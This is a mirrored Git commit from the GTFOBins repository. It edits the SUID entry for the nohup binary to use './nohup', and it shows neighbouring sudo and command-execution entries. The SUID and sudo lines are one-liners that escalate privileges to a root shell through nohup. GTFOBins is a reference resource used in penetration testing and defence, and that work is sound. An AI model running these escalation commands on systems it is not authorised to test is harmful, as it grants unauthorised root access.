mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add ./ to SUID category in nohup.mp
This commit is contained in:
parent
561a5b2c9a
commit
b43f418ddb
@ -8,7 +8,7 @@ functions:
|
||||
nohup "$COMMAND"
|
||||
cat nohup.out
|
||||
suid:
|
||||
- code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||
- code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||
sudo:
|
||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user